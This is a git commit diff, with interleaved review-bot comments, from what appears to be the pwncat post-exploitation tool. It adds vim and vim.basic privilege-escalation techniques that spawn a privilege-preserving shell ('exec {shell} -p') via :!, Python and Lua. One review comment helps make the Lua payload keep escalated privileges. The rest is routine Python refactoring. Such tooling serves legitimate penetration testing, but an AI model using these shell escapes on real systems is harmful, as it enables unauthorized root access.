
Got vim seemingly working as a GTFObin...

This commit is contained in:
John Hammond 2020-05-23 04:34:37 -04:00
parent 3801b50f14
commit 2eb9487e64
5 changed files with 66 additions and 16 deletions


@ -879,19 +879,19 @@
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"], "args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself. // Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n" "exit": "exit\n\n"
}, },
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"] "args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
}, },
{ {
"type": "shell", "type": "shell",
"payload": "{command}", "payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"] "args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
}, },
{ {
"type": "shell", "type": "shell",
@ -907,10 +907,47 @@
{ {
"type": "write", "type": "write",
"stream": "print", "stream": "print",
"payload": "{command} >/dev/null", "payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"] "args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
}
],
"vim.basic": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!exec {shell} -p'", "-c", "':q'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-p\", \"-c\", \"reset; exec {shell} -p\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{cat} - | {command}",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"],
"exit": "{ctrl_d}"
} }
// Vim can PROBABLY file write... but I have not figured that out just yet.
], ],
//------------------------------------------------------------------- //-------------------------------------------------------------------
"wish": [ "wish": [
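Review bot: The lua technique copied into `vim.basic` (`':lua os.execute("reset; exec {shell}")'`) is the one shell entry in this commit that execs the shell without `-p`, while the `:!`, `:py` and `:py3` siblings were all changed to `exec {shell} -p`; when the binary is reached as a setuid file rather than through sudo, bash resets the effective UID on startup unless `-p` is given, so this entry would hand back an unprivileged shell. `':lua os.execute("reset; exec {shell} -p")'` keeps it consistent with the rest of the block. Two caveats worth a comment in the file: `-p` is a bash/zsh option, so if `{shell}` can resolve to `sh`/`dash` the flag is rejected, and `vim.basic` is now a verbatim copy of `vim`, so any future fix has to be applied to both entries.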


@ -9,10 +9,6 @@ from sqlalchemy.exc import InvalidRequestError
import warnings import warnings
from sqlalchemy import exc as sa_exc from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat import pwncat
from pwncat import util from pwncat import util
from pwncat.remote import Victim from pwncat.remote import Victim
@ -80,5 +76,11 @@ def main():
if __name__ == "__main__": if __name__ == "__main__":
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
main() main()
sys.exit(0) sys.exit(0)
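Review bot: Moving the `catch_warnings()` block under `if __name__ == "__main__":` means the SAWarning filter is active only while `main()` runs; any SAWarning emitted at import time (SQLAlchemy model declaration pulled in by `import pwncat`) is no longer covered, so if the original placement was meant to quiet import-time noise this reintroduces it — the rendered hunk does not show whether the old `import` lines sat inside the `with`. If the intent is to silence the category for the whole process, a plain `warnings.simplefilter("ignore", category=sa_exc.SAWarning)` before `main()` without the context manager is simpler and avoids `catch_warnings()`, which modifies module-global state and is documented as not thread-safe. Ignoring the entire SAWarning category also hides genuine mapper/relationship problems; narrowing it with `warnings.filterwarnings("ignore", message=r"...", category=sa_exc.SAWarning)` on the specific message would be safer.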


@ -238,7 +238,7 @@ class CommandParser:
# We have a connection! Go back to raw mode # We have a connection! Go back to raw mode
pwncat.victim.state = State.RAW pwncat.victim.state = State.RAW
self.running = False self.running = False
except Exception as exc: except (Exception, KeyboardInterrupt) as exc:
traceback.print_exc() traceback.print_exc()
continue continue
@ -299,7 +299,7 @@ class CommandParser:
command.parser.prog = prog_name command.parser.prog = prog_name
except SystemExit: except SystemExit:
# The arguments were icncorrect # The arguments were incorrect
return return
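Review bot: Catching `KeyboardInterrupt` together with `Exception` and then `continue`-ing in the first hunk means an operator Ctrl-C in this loop no longer aborts anything — it prints a full traceback via `traceback.print_exc()` and re-enters the loop, so a hung command can only be escaped if some other exit path exists outside the hunk. If swallowing the interrupt is intended, give it its own quiet branch ahead of the generic handler, `except KeyboardInterrupt: continue`, and keep `except Exception: traceback.print_exc(); continue` for real errors; `as exc` is unused in both and can be dropped. The enclosing method starts before the hunk.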


@ -265,7 +265,7 @@ class MethodWrapper:
return self.method.build_payload(self.binary_path, **kwargs) return self.method.build_payload(self.binary_path, **kwargs)
def exit(self, **kwargs) -> str: def exit(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries( original = self.method.binary.gtfo.resolve_binaries(
self.method.exit, self.method.exit,
ctrl_c=ControlCodes.CTRL_C, ctrl_c=ControlCodes.CTRL_C,
ctrl_z=ControlCodes.CTRL_Z, ctrl_z=ControlCodes.CTRL_Z,
@ -275,6 +275,11 @@ class MethodWrapper:
**kwargs, **kwargs,
) )
if original == "" and Capability.SHELL in self.cap:
original = "exit\n"
return original
def input(self, **kwargs) -> str: def input(self, **kwargs) -> str:
return self.method.binary.gtfo.resolve_binaries( return self.method.binary.gtfo.resolve_binaries(
self.method.input, self.method.input,
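Review bot: The new fallback in `exit()` only fires on `original == ""`; if `self.method.exit` is unset and `resolve_binaries` passes a `None` through, the SHELL fallback is skipped and `None` is returned where the `-> str` annotation promises a string — `resolve_binaries` is not visible here, so `if not original and Capability.SHELL in self.cap:` is the defensive spelling. The hard-coded `"exit\n"` assumes a POSIX-style interactive shell, which matches the `exec {shell}` techniques but deserves stating; a docstring such as `"""Return the input that leaves the spawned program; SHELL techniques with no explicit exit string default to 'exit'."""` would cover it. The method body is split across the two hunks, with lines between them not shown.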


@ -277,12 +277,14 @@ class Finder:
for technique in techniques: for technique in techniques:
if Capability.SHELL in technique.capabilities: if Capability.SHELL in technique.capabilities:
try: try:
# Attempt our basic, known technique # Attempt our basic, known technique
shlvl = pwncat.victim.getenv("SHLVL")
exit_script = technique.method.execute(technique) exit_script = technique.method.execute(technique)
pwncat.victim.flush_output(some=True) pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable # Reset the terminal to ensure we are stable
time.sleep(0.1) time.sleep(0.1) # This seems inevitable for some privescs...
pwncat.victim.reset() pwncat.victim.reset()
# Check that we actually succeeded # Check that we actually succeeded
@ -300,7 +302,9 @@ class Finder:
# Get out of this subshell. We don't need it # Get out of this subshell. We don't need it
# pwncat.victim.process(exit_script, delim=False) # pwncat.victim.process(exit_script, delim=False)
pwncat.victim.run(exit_script, wait=False) pwncat.victim.run(exit_script, wait=False)
time.sleep(0.1) # Still inevitable for some privescs...
pwncat.victim.recvuntil("\n") pwncat.victim.recvuntil("\n")
# Clean up whatever mess was left over # Clean up whatever mess was left over
@ -312,6 +316,8 @@ class Finder:
# Continue on as if it hadn't worked. # Continue on as if it hadn't worked.
except PrivescError: except PrivescError:
pass pass
except ValueError:
raise PrivescError
if Capability.READ in technique.capabilities: if Capability.READ in technique.capabilities:
readers.append(technique) readers.append(technique)
if Capability.WRITE in technique.capabilities: if Capability.WRITE in technique.capabilities:
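Review bot: `shlvl = pwncat.victim.getenv("SHLVL")` is assigned but never read in any of the visible hunks, so as committed it is an extra round-trip to the victim with no effect; if it is meant to verify that `execute()` really spawned a nested shell, read it again after the privesc and compare (bearing in mind SHLVL is set by bash/zsh but not exported by dash), otherwise drop the line. The new `except ValueError: raise PrivescError` also discards the original error; `except ValueError as exc: raise PrivescError(str(exc)) from exc` (or `raise PrivescError from exc` if the constructor takes no message) keeps the cause in the traceback. The `for technique in techniques:` loop and its `try` continue outside the hunks shown.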